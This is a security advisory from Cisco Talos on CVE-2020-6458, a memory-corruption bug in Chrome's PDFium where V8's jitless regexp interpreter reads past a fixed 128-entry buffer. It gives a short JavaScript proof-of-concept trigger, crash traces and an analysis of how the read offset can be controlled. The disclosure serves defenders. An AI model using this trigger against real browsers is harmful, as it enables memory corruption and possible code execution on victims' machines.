Talos Vulnerability Report

TALOS-2020-1044

Google Chrome PDFium Javascript Regexp Memory Corruption Vulnerability

July 2, 2020

CVE Number

CVE-2020-6458

Summary

An exploitable memory corruption vulnerability exists in the way PDFium inside Google Chrome version 80.0.3987.158 executes Javascript regular expressions. The vulnerability could potentially be abused to achieve arbitrary code execution in the browser context. In order to trigger this vulnerability, a victim needs to open a malicious web page.

Tested Versions

Google Chrome 80.0.3987.158

Product URLs

https://www.google.com/chrome/

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-805 - Buffer Access with Incorrect Length Value

Details

Google Chrome is currently the most widely used web browser.

PDFium is an open source PDF renderer developed by Google and used extensively in the Chrome browser, in online services, and in other standalone applications. This bug was triaged on the current release version, the latest git version, and the latest Chromium AddressSanitizer build available.

PDFium supports execution of Javascript scripts embedded inside PDF documents. Like Chrome itself, PDFium uses V8 as its Javascript engine. This vulnerability lies in the way V8, in a specific configuration, processes regular expressions. Executing the following Javascript code is enough to trigger the vulnerability:

var a  = Array(1802).join(" +") + Array(16884).join("A");
"A".search(a);
"A".search(a);

The above code first creates a very large string that acts as a regular expression. Two identical lines then execute this regex against the string “A”. Either the + or the ? symbol in the regex can trigger the vulnerability. By embedding the above code inside a PDF document and opening it in Chrome (or in pdfium_test directly), we can observe the following crash:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==58924==ERROR: AddressSanitizer: SEGV on unknown address 0x7ea80000c074 (pc 0x55d60a40f51f bp 0x7ffd549c5ed0 sp 0x7ffd549c5d20 T0)
==58924==The signal is caused by a READ memory access.
    #0 0x55d60a40f51f in v8::internal::IrregexpInterpreter::Result v8::internal::(anonymous namespace)::RawMatch<unsigned char>(v8::internal::Isolate*, v8::internal::ByteArray, v8::internal::String, v8::internal::Vector<unsigned char const>, int*, int, unsigned int, v8::internal::RegExp::CallOrigin, unsigned int) ./../../v8/src/regexp/regexp-interpreter.cc:?
    #1 0x55d60a40f51f in ?? ??:0
    #2 0x55d60a40e061 in v8::internal::IrregexpInterpreter::MatchInternal(v8::internal::Isolate*, v8::internal::ByteArray, v8::internal::String, int*, int, int, v8::internal::RegExp::CallOrigin, unsigned int) ./../../v8/src/regexp/regexp-interpreter.cc:994
    #3 0x55d60a40e061 in ?? ??:0
    #4 0x55d60a43faa7 in Match ./../../v8/src/regexp/regexp-interpreter.cc:964
    #5 0x55d60a43faa7 in MatchForCallFromJs ./../../v8/src/regexp/regexp-interpreter.cc:1031
    #6 0x55d60a43faa7 in ?? ??:0
    #7 0x55d60bf42ccf in Builtins_RegExpSearchFast setup-isolate-deserialize.cc:?
    #8 0x55d60bf42ccf in ?? ??:0
    #9 0x55d60bd61fbb in Builtins_StringPrototypeSearch setup-isolate-deserialize.cc:?
    #10 0x55d60bd61fbb in ?? ??:0
    #11 0x55d60bb84cd0 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc:?
    #12 0x55d60bb84cd0 in ?? ??:0
    #13 0x55d60bb84cd0 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc:?
    #14 0x55d60bb84cd0 in ?? ??:0
    #15 0x55d60bb7b739 in Builtins_JSEntryTrampoline setup-isolate-deserialize.cc:?
    #16 0x55d60bb7b739 in ?? ??:0
    #17 0x55d60bb7b517 in Builtins_JSEntry setup-isolate-deserialize.cc:?
    #18 0x55d60bb7b517 in ?? ??:0
    #19 0x55d6095058cd in Call ./../../v8/src/execution/simulator.h:142
    #20 0x55d6095058cd in Invoke ./../../v8/src/execution/execution.cc:367
    #21 0x55d6095058cd in ?? ??:0
    #22 0x55d609504765 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) ./../../v8/src/execution/execution.cc:461
    #23 0x55d609504765 in ?? ??:0
    #24 0x55d608e4926c in v8::Script::Run(v8::Local<v8::Context>) ./../../v8/src/api/api.cc:2201
    #25 0x55d608e4926c in ?? ??:0
    #26 0x55d608bb5e5f in CFXJS_Engine::Execute(fxcrt::WideString const&) ./../../fxjs/cfxjs_engine.cpp:562
    #27 0x55d608bb5e5f in ?? ??:0
    #28 0x55d608dd3a14 in CJS_Runtime::ExecuteScript(fxcrt::WideString const&) ./../../fxjs/cjs_runtime.cpp:165
    #29 0x55d608dd3a14 in ?? ??:0
    #30 0x55d608cda7b4 in CJS_EventContext::RunScript(fxcrt::WideString const&) ./../../fxjs/cjs_event_context.cpp:54
    #31 0x55d608cda7b4 in ?? ??:0
    #32 0x55d607d291c6 in CPDFSDK_ActionHandler::RunScript(CPDFSDK_FormFillEnvironment*, fxcrt::WideString const&, std::__1::function<void (IJS_EventContext*)> const&) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:424
    #33 0x55d607d291c6 in ?? ??:0
    #34 0x55d607d26849 in CPDFSDK_ActionHandler::RunDocumentOpenJavaScript(CPDFSDK_FormFillEnvironment*, fxcrt::WideString const&, fxcrt::WideString const&) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:347
    #35 0x55d607d26849 in ?? ??:0
    #36 0x55d607d26253 in CPDFSDK_ActionHandler::ExecuteDocumentOpenAction(CPDF_Action const&, CPDFSDK_FormFillEnvironment*, std::__1::set<CPDF_Dictionary const*, std::__1::less<CPDF_Dictionary const*>, std::__1::allocator<CPDF_Dictionary const*> >*) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:104
    #37 0x55d607d26253 in ?? ??:0
    #38 0x55d607d25e28 in CPDFSDK_ActionHandler::DoAction_DocOpen(CPDF_Action const&, CPDFSDK_FormFillEnvironment*) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:26
    #39 0x55d607d25e28 in ?? ??:0
    #40 0x55d607dba9cc in CPDFSDK_FormFillEnvironment::ProcOpenAction() ./../../fpdfsdk/cpdfsdk_formfillenvironment.cpp:624
    #41 0x55d607dba9cc in ?? ??:0
    #42 0x55d607e68232 in FORM_DoDocumentOpenAction ./../../fpdfsdk/fpdf_formfill.cpp:739
    #43 0x55d607e68232 in ?? ??:0
    #44 0x55d607cf457c in (anonymous namespace)::RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, (anonymous namespace)::Options const&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) ./../../samples/pdfium_test.cc:935
    #45 0x55d607cf457c in ?? ??:0
    #46 0x55d607cef3b0 in main ./../../samples/pdfium_test.cc:1172
    #47 0x55d607cef3b0 in ?? ??:0
    #48 0x7f121a0ca82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
    #49 0x7f121a0ca82f in ?? ??:0

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/ramdisk/repo/pdfium/out/DebugASAN/pdfium_test+0x414351f)
==58924==ABORTING
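
Before turning to the root cause, the shape of the pattern string built on the first PoC line can be checked on its own. The sketch below is illustrative: buildPattern is a hypothetical helper name, not part of the original PoC, and it relies only on the standard behavior that Array(n).join(sep) produces n - 1 copies of sep. It does not run the regular expression.

```javascript
// Hypothetical helper that mirrors the first line of the PoC.
// Array(n).join(sep) puts sep between n empty slots, so it yields n - 1 copies of sep.
function buildPattern(quantifierSlots, literalSlots) {
  return Array(quantifierSlots).join(" +") + Array(literalSlots).join("A");
}

const pattern = buildPattern(1802, 16884);

// Count occurrences by splitting on the character of interest.
const plusCount = pattern.split("+").length - 1;
const literalCount = pattern.split("A").length - 1;

console.log(pattern.length); // 20485
console.log(plusCount);      // 1801
console.log(literalCount);   // 16883
```

The pattern is therefore a little over 20,000 characters long, with the run of quantified spaces at the front and a long literal tail of A characters behind it.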

To understand the root cause of the crash we need to step back and examine how the Regexp engine works in V8.

The first thing to note is that although the above PoC Javascript code isn’t PDFium specific, it doesn’t trigger the same crash in Chrome in a webpage context. This can also be observed by running the code inside the d8 Javascript shell:

./d8
V8 version 8.3.65
d8> var a  = Array(1802).join(" +") + Array(16884).join("A");
undefined
d8> "A".search(a);
-1
d8> "A".search(a);
-1
d8>

If we were to dig through the execution in a debugger, we would notice that since the second search call uses the identical regex and target string, the code JITed during the first call is executed. The exact same code is executed twice and no crash is triggered. Running V8 in “jitless” mode, on the other hand, produces a different result:

./d8 --jitless
V8 version 8.3.65
d8> var a  = Array(1802).join(" +") + Array(16884).join("A");
undefined
d8> "A".search(a);
-1
d8> "A".search(a);
Received signal 11 SEGV_ACCERR 7ed10000c05c

==== C stack trace ===============================

 [0x55c1ec79184b]
 [0x55c1eeb5d036]
 [0x7f1154dd3390]
 [0x55c1ed786c80]
 [0x55c1ed786527]
 [0x55c1ed79011e]
 [0x55c1ee9e4603]
[end of stack trace]
Segmentation fault (core dumped)

Looking at the PDFium source code reveals that V8 is indeed initialized in “jitless” mode, for the reasons given in the code comments:

FPDF_EXPORT const char* FPDF_CALLCONV FPDF_GetRecommendedV8Flags() {
  // Reduce exposure since no PDF should contain web assembly.
  // Use interpreted JS only to avoid RWX pages in our address space.
  return "--no-expose-wasm --jitless";
}

...

std::unique_ptr<v8::Platform> InitializeV8Common(const std::string& exe_path) {
  v8::V8::InitializeICUDefaultLocation(exe_path.c_str());

  std::unique_ptr<v8::Platform> platform = v8::platform::NewDefaultPlatform();
  v8::V8::InitializePlatform(platform.get());

  const char* recommended_v8_flags = FPDF_GetRecommendedV8Flags();
  v8::V8::SetFlagsFromString(recommended_v8_flags);

  // By enabling predictable mode, V8 won't post any background tasks.
  // By enabling GC, it makes it easier to chase use-after-free.
  static const char kAdditionalV8Flags[] = "--predictable --expose-gc";
  v8::V8::SetFlagsFromString(kAdditionalV8Flags);

  v8::V8::Initialize();
  return platform;
}

So, in order for this vulnerability to be reachable and exploitable in the full Chrome browser, the triggering code needs to be embedded inside a PDF document.

To further understand the root cause of the vulnerability, we can observe the execution of the PoC code in the d8 shell. The backtrace at the time of the crash is:

#0  0x00005555589844b3 in (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::RawMatch<unsigned char>((anonymous namespace)::(anonymous namespace)::Isolate *, (anonymous namespace)::(anonymous namespace)::ByteArray, (anonymous namespace)::(anonymous namespace)::String, (anonymous namespace)::(anonymous namespace)::Vector<unsigned char const>, int *, int, uint32_t, enum (anonymous namespace)::(anonymous namespace)::RegExp::CallOrigin, uint32_t) (isolate=0x9a800000000, code_array=..., subject_string=..., subject=..., registers=0x9a80000a44c, current=0x0, current_char=0xa, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:406
#1  0x0000555558983c68 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#2  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs) at ../../v8/src/regexp/regexp-interpreter.cc:964
#3  0x0000555558991456 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromJs (subject=0x9a8002639e9, start_position=0x0, registers=0x9a80000a44c, registers_length=0x2, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, isolate=0x9a800000000, regexp=0x9a8000fa2f9) at ../../v8/src/regexp/regexp-interpreter.cc:1031
#4  0x000055555995c630 in Builtins_RegExpSearchFast ()
#5  0x000055555977b91c in Builtins_StringPrototypeSearch ()
#6  0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#7  0x000009a8000f4655 in ?? ()
#8  0x000009a8002639e9 in ?? ()
#9  0x000009a8002639e9 in ?? ()
#10 0x000009a8000d34fd in ?? ()
#11 0x000009a8002639e9 in ?? ()
#12 0x000009a8002572e5 in ?? ()
#13 0x000009a8000f4655 in ?? ()
#14 0x0000000000000102 in ?? ()
#15 0x000009a800263a45 in ?? ()
#16 0x000009a800263985 in ?? ()
#17 0x000009a800252b45 in ?? ()
#18 0x00007fffffffd0e0 in ?? ()
#19 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#20 0x000009a8000c716d in ?? ()
#21 0x000009a800263941 in ?? ()
#22 0x000009a800263985 in ?? ()
#23 0x000009a80004030d in ?? ()
#24 0x0000000000000064 in ?? ()
#25 0x000009a8002638f5 in ?? ()
#26 0x000009a800263941 in ?? ()
#27 0x000009a800252b45 in ?? ()
#28 0x00007fffffffd108 in ?? ()
#29 0x000055555959509a in Builtins_JSEntryTrampoline ()
#30 0x000009a8000c716d in ?? ()
#31 0x000009a800263941 in ?? ()
#32 0x0000000000000024 in ?? ()
#33 0x00007fffffffd170 in ?? ()
#34 0x0000555559594e78 in Builtins_JSEntry ()

The crash happens at ../../v8/src/regexp/regexp-interpreter.cc:406:

  if (!backtrack_stack.push(registers[insn >> BYTECODE_SHIFT])) {
    return MaybeThrowStackOverflow(isolate, call_origin);
  }

The segmentation fault is due to an out-of-bounds read of the registers array. The question is how the two calls to search differ. Setting a breakpoint at ../../v8/src/regexp/regexp-interpreter.cc:994 gives us a hint. When the breakpoint is hit the first time, we can observe the following call stack:

#0  (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x55555a095138, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromRuntime, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#1  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x55555a095138, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromRuntime) at ../../v8/src/regexp/regexp-interpreter.cc:964
#2  0x0000555558991526 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromRuntime (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x55555a095138, registers_length=0x2, start_position=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:1040
#3  0x00005555589ae58b in (anonymous namespace)::(anonymous namespace)::RegExpImpl::IrregexpExecRaw (isolate=0x9a800000000, regexp=..., subject=..., index=0x0, output=0x55555a095130, output_size=0x70d) at ../../v8/src/regexp/regexp.cc:574
#4  0x00005555589ab59f in (anonymous namespace)::(anonymous namespace)::RegExpImpl::IrregexpExec (isolate=0x9a800000000, regexp=..., subject=..., previous_index=0x0, last_match_info=...) at ../../v8/src/regexp/regexp.cc:652
#5  0x00005555589aaf36 in (anonymous namespace)::(anonymous namespace)::RegExp::Exec (isolate=0x9a800000000, regexp=..., subject=..., index=0x0, last_match_info=...) at ../../v8/src/regexp/regexp.cc:214
#6  0x0000555558a40f4b in (anonymous namespace)::(anonymous namespace)::__RT_impl_Runtime_RegExpExec (args=..., isolate=0x9a800000000) at ../../v8/src/runtime/runtime-regexp.cc:880
#7  0x0000555558a40888 in (anonymous namespace)::(anonymous namespace)::Runtime_RegExpExec (args_length=0x4, args_object=0x7fffffffcf28, isolate=0x9a800000000) at ../../v8/src/runtime/runtime-regexp.cc:868
#8  0x00005555597bb45f in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit ()
#9  0x000055555995e6c4 in Builtins_RegExpSearchFast ()
#10 0x000055555977b91c in Builtins_StringPrototypeSearch ()
#11 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#12 0x000009a8000f4655 in ?? ()
#13 0x000009a8002639e9 in ?? ()
#14 0x000009a8002639e9 in ?? ()
#15 0x000009a8000d34fd in ?? ()
#16 0x000009a8002639e9 in ?? ()
#17 0x000009a8002572e5 in ?? ()
#18 0x000009a8000f4655 in ?? ()
#19 0x00000000000000e4 in ?? ()
#20 0x000009a800263a45 in ?? ()
#21 0x000009a800263985 in ?? ()
#22 0x000009a800252b45 in ?? ()
#23 0x00007fffffffd0e0 in ?? ()
#24 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#25 0x000009a8000c716d in ?? ()
#26 0x000009a800263941 in ?? ()
#27 0x000009a800263985 in ?? ()
#28 0x000009a80004030d in ?? ()
#29 0x0000000000000064 in ?? ()
#30 0x000009a8002638f5 in ?? ()
#31 0x000009a800263941 in ?? ()
#32 0x000009a800252b45 in ?? ()
#33 0x00007fffffffd108 in ?? ()
#34 0x000055555959509a in Builtins_JSEntryTrampoline ()
#35 0x000009a8000c716d in ?? ()
#36 0x000009a800263941 in ?? ()
#37 0x0000000000000024 in ?? ()
#38 0x00007fffffffd170 in ?? ()
#39 0x0000555559594e78 in Builtins_JSEntry ()

A function call of note in the above call stack is IrregexpInterpreter::MatchForCallFromRuntime. When the breakpoint is hit a second time, the call stack is slightly different:

#0  (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#1  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs) at ../../v8/src/regexp/regexp-interpreter.cc:964
#2  0x0000555558991456 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromJs (subject=0x9a8002639e9, start_position=0x0, registers=0x9a80000a44c, registers_length=0x2, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, isolate=0x9a800000000, regexp=0x9a8000fa2f9) at ../../v8/src/regexp/regexp-interpreter.cc:1031
#3  0x000055555995c630 in Builtins_RegExpSearchFast ()
#4  0x000055555977b91c in Builtins_StringPrototypeSearch ()
#5  0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#6  0x000009a8000f4655 in ?? ()
#7  0x000009a8002639e9 in ?? ()
#8  0x000009a8002639e9 in ?? ()
#9  0x000009a8000d34fd in ?? ()
#10 0x000009a8002639e9 in ?? ()
#11 0x000009a8002572e5 in ?? ()
#12 0x000009a8000f4655 in ?? ()
#13 0x0000000000000102 in ?? ()
#14 0x000009a800263a45 in ?? ()
#15 0x000009a800263985 in ?? ()
#16 0x000009a800252b45 in ?? ()
#17 0x00007fffffffd0e0 in ?? ()
#18 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#19 0x000009a8000c716d in ?? ()
#20 0x000009a800263941 in ?? ()
#21 0x000009a800263985 in ?? ()
#22 0x000009a80004030d in ?? ()
#23 0x0000000000000064 in ?? ()
#24 0x000009a8002638f5 in ?? ()
#25 0x000009a800263941 in ?? ()
#26 0x000009a800252b45 in ?? ()
#27 0x00007fffffffd108 in ?? ()
#28 0x000055555959509a in Builtins_JSEntryTrampoline ()
#29 0x000009a8000c716d in ?? ()
#30 0x000009a800263941 in ?? ()
#31 0x0000000000000024 in ?? ()
#32 0x00007fffffffd170 in ?? ()
#33 0x0000555559594e78 in Builtins_JSEntry ()

Instead of a call coming from the runtime, we see IrregexpInterpreter::MatchForCallFromJs. Among other differences, the two functions differ in who calls them: MatchForCallFromJs is called from builtins, which consist of Torque and CSA (CodeStubAssembler) code. Following the relevant code, we find that the function that ends up calling MatchForCallFromJs with the final value of registers is RegExpBuiltinsAssembler::RegExpExecInternal, the actual call being:

TNode<Int32T> result =
    UncheckedCast<Int32T>(CallCFunctionWithoutFunctionDescriptor(
        code_entry, retval_type, std::make_pair(arg0_type, arg0),
        std::make_pair(arg1_type, arg1), std::make_pair(arg2_type, arg2),
        std::make_pair(arg3_type, arg3), std::make_pair(arg4_type, arg4),
        std::make_pair(arg5_type, arg5), std::make_pair(arg6_type, arg6),
        std::make_pair(arg7_type, arg7), std::make_pair(arg8_type, arg8),
        std::make_pair(arg9_type, arg9)));

Since we are interested in the registers parameter of MatchForCallFromJs, we need to look up arg4 from above:

// Argument 4: static offsets vector buffer.
MachineType arg4_type = type_ptr;
TNode<ExternalReference> arg4 = static_offsets_vector_address;

The value of static_offsets_vector_address comes from:

TNode<ExternalReference> static_offsets_vector_address = ExternalConstant(
    ExternalReference::address_of_static_offsets_vector(isolate()));

This vector is set up when the current isolate is initialized and is statically sized to hold 128 ints:

static const int kJSRegexpStaticOffsetsVectorSize = 128;
...

#define ISOLATE_INIT_ARRAY_LIST(V)                                             \
  /* SerializerDeserializer state. */                                          \
  V(int32_t, jsregexp_static_offsets_vector, kJSRegexpStaticOffsetsVectorSize) \
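
The size mismatch can be made concrete with a small model. The sketch below is not V8 code: readRegister and the constant names are hypothetical, and it assumes that output_size=0x70d in the IrregexpExecRaw frame of the first call stack counts 32-bit entries. It compares the buffer the runtime path worked with against the 128-entry static vector, and shows the kind of index check that would reject a read past the end of the smaller one.

```javascript
// Illustrative model only; the names here are not V8 identifiers
// unless a comment says otherwise.
const STATIC_VECTOR_ENTRIES = 128;    // kJSRegexpStaticOffsetsVectorSize
const RUNTIME_OUTPUT_ENTRIES = 0x70d; // output_size in IrregexpExecRaw (assumed to count entries)
const BYTES_PER_ENTRY = Int32Array.BYTES_PER_ELEMENT; // 4 bytes per int32_t

const staticBytes = STATIC_VECTOR_ENTRIES * BYTES_PER_ENTRY;
const runtimeBytes = RUNTIME_OUTPUT_ENTRIES * BYTES_PER_ENTRY;

// Hypothetical checked accessor: throws instead of reading out of bounds.
function readRegister(registers, index) {
  if (!Number.isInteger(index) || index < 0 || index >= registers.length) {
    throw new RangeError(
      "register index " + index + " is outside a buffer of " +
        registers.length + " entries"
    );
  }
  return registers[index];
}

// Stand-in for the statically sized vector owned by the isolate.
const staticVector = new Int32Array(STATIC_VECTOR_ENTRIES);

console.log(staticBytes);  // 512
console.log(runtimeBytes); // 7220
console.log(readRegister(staticVector, STATIC_VECTOR_ENTRIES - 1)); // 0 (last valid entry)

try {
  readRegister(staticVector, STATIC_VECTOR_ENTRIES); // first index past the end
} catch (e) {
  console.log(e.message);
}
```

Under these assumptions the static vector is 512 bytes, while the buffer seen on the runtime path is roughly fourteen times larger.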

If we go back to the context of the crash, we can observe the following:

x/i $pc
=> 0x5555589844b3 <(anonymous namespace)::(anonymous namespace)::(anonymous namespace)::RawMatch<unsigned char>((anonymous namespace)::(anonymous namespace)::Isolate *, (anonymous namespace)::(anonymous namespace)::ByteArray, (anonymous namespace)::(anonymous namespace)::String, (anonymous namespace)::(anonymous namespace)::Vector<unsigned char const>, int *, int, uint32_t, enum (anonymous namespace)::(anonymous namespace)::RegExp::CallOrigin, uint32_t)+1715>:      mov    esi,DWORD PTR [rax+rdx*4]
# bt 10
#0  0x00005555589844b3 in (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::RawMatch<unsigned char>((anonymous namespace)::(anonymous namespace)::Isolate *, (anonymous namespace)::(anonymous namespace)::ByteArray, (anonymous namespace)::(anonymous namespace)::String, (anonymous namespace)::(anonymous namespace)::Vector<unsigned char const>, int *, int, uint32_t, enum (anonymous namespace)::(anonymous namespace)::RegExp::CallOrigin, uint32_t) (isolate=0x9a800000000, code_array=..., subject_string=..., subject=..., registers=0x9a80000a44c, current=0x0, current_char=0xa, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:406
#1  0x0000555558983c68 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#2  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs) at ../../v8/src/regexp/regexp-interpreter.cc:964
#3  0x0000555558991456 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromJs (subject=0x9a8002639e9, start_position=0x0, registers=0x9a80000a44c, registers_length=0x2, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, isolate=0x9a800000000, regexp=0x9a8000fa2f9) at ../../v8/src/regexp/regexp-interpreter.cc:1031
#4  0x000055555995c630 in Builtins_RegExpSearchFast ()
#5  0x000055555977b91c in Builtins_StringPrototypeSearch ()
#6  0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#7  0x000009a8000f4655 in ?? ()
#8  0x000009a8002639e9 in ?? ()
#9  0x000009a8002639e9 in ?? ()
(More stack frames follow...)
# i r rax rdx
rax            0x9a80000a44c    0x9a80000a44c
rdx            0x70a    0x70a

The crashing instruction is an indexed memory dereference in which rax is the base pointer. It comes directly from the registers parameter, which we previously determined points to static_offsets_vector_address, a buffer of limited size. The offset into this array is in rdx, which holds 0x70a (1802), matching the 1802 used to build the run of special + characters in our regular expression. Thus, by controlling the size of the string and the number of matching special characters (the “?” character triggers the same behavior), we can control the offset of the out-of-bounds read. This can lead to further memory corruption, which could potentially be abused to achieve an info leak or possibly arbitrary code execution.
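
The faulting address follows directly from the register values shown in the debugger output. The sketch below redoes that arithmetic; the variable names are illustrative, and it assumes, as the analysis does, that rax points at the start of the 128-entry static vector.

```javascript
// Values copied from the debugger session; BigInt keeps 64-bit addresses exact.
const base = 0x9a80000a44cn; // rax: the registers pointer
const index = 0x70an;        // rdx: register index
const ENTRY_BYTES = 4n;      // scale factor in [rax+rdx*4]
const VECTOR_ENTRIES = 128n; // kJSRegexpStaticOffsetsVectorSize

// Address actually dereferenced by the crashing mov instruction.
const readAddress = base + index * ENTRY_BYTES;

// One past the last byte of the vector, assuming rax is the vector start.
const vectorEnd = base + VECTOR_ENTRIES * ENTRY_BYTES;

// How far beyond the vector the read lands, in bytes.
const overshoot = readAddress - vectorEnd;

console.log("0x" + readAddress.toString(16)); // 0x9a80000c074
console.log("0x" + vectorEnd.toString(16));   // 0x9a80000a64c
console.log(overshoot.toString());            // 6696
```

The read lands 6696 bytes past the end of a 512-byte vector starting at rax. The low bits of the result also match the AddressSanitizer fault address 0x7ea80000c074 from the pdfium_test run, which is consistent with the same register index being read in both cases.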

Timeline

2020-04-02 - Vendor Disclosure

2020-04-08 - Vendor completed beta testing
2020-04-17 - Vendor patched
2020-07-02 - Public Release

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.